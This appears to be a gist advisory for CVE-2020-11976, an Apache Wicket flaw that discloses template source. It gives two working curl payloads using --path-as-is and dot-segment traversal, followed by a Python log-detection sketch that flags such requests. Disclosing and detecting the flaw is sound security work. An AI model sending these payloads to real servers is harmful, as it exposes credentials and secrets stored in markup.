Last active
June 2, 2021 16:52
CVE-2020-11976 - Apache Wicket LFI / markup source file read vulnerability
------------------------------------------
By crafting a special URL it is possible to make Wicket deliver unprocessed HTML templates.
This would allow an attacker to see possibly sensitive information inside an HTML template that is usually removed during rendering.
Affected are Apache Wicket versions 7.16.0, 8.8.0 and 9.0.0-M5.
For example, if there are credentials in the markup which are never supposed to be visible to the client:
<wicket:remove>
some secret
</wicket:remove>
Payload:
$ curl --path-as-is http://127.0.0.1:8088/prototype/wicket/resource/org.apache.wicket.examples.WicketExamplePage/./WicketExamplePage.html
$ curl --insecure --path-as-is https://192.168.1.11:8443/wicket/resource/org.apache.wicket.Application/../../../SecretMarkupFile.html
MISC:https://lists.apache.org/thread.html/r104eeefeb1e9da51f7ef79cef0f9ff12e21ef8559b77801e86b21e16%40%3Cusers.wicket.apache.org%3E
URL:https://lists.apache.org/thread.html/r104eeefeb1e9da51f7ef79cef0f9ff12e21ef8559b77801e86b21e16%40%3Cusers.wicket.apache.org%3E
Mariusz Popławski / AFINE.com team
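Detection sketch for the request pattern shown above, added here as an example and not part of the original gist or of Apache Wicket. It assumes combined-format access logs that record the raw request line; the function names, the sample log lines and the rule that markup files are never legitimate resource requests are assumptions.

```python
import re
from urllib.parse import unquote

# Wicket resource mount point, as seen in the URLs on this page.
RESOURCE_PREFIX = "/wicket/resource/"
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')


def check_target(target):
    """Return the reasons a request target matches the CVE-2020-11976 pattern."""
    path = target.split("?", 1)[0]
    for _ in range(3):  # undo nested percent-encoding before inspecting
        path = unquote(path)
    _, found, rest = path.replace("\\", "/").partition(RESOURCE_PREFIX)
    if not found:
        return []
    segments = rest.split("/")
    reasons = []
    # "." or ".." after the resource prefix only survives when the client
    # sent the path unnormalised (what curl --path-as-is does).
    if any(seg in (".", "..") for seg in segments):
        reasons.append("dot-segment")
    # Assumption: markup templates are never legitimately served as resources.
    if segments[-1].lower().endswith((".html", ".htm")):
        reasons.append("markup-file")
    return reasons


def scan(log_lines):
    """Return (line_number, target, reasons) for each suspicious log entry."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        reasons = check_target(match.group(1)) if match else []
        if reasons:
            hits.append((number, match.group(1), reasons))
    return hits


# Constructed sample log lines (hypothetical hosts and class names).
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Jun/2021:16:50:01 +0000] "GET /wicket/resource/org.example.HomePage/style.css HTTP/1.1" 200 512',
    '10.0.0.9 - - [02/Jun/2021:16:50:07 +0000] "GET /app/wicket/resource/org.example.HomePage/./HomePage.html HTTP/1.1" 200 2048',
    '10.0.0.9 - - [02/Jun/2021:16:50:09 +0000] "GET /wicket/resource/org.example.App/../../../Template.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for number, target, reasons in scan(SAMPLE_LOG):
        print(number, target, ",".join(reasons))
```

A 200 response on a flagged line is the case worth triaging first, since it means markup was actually returned.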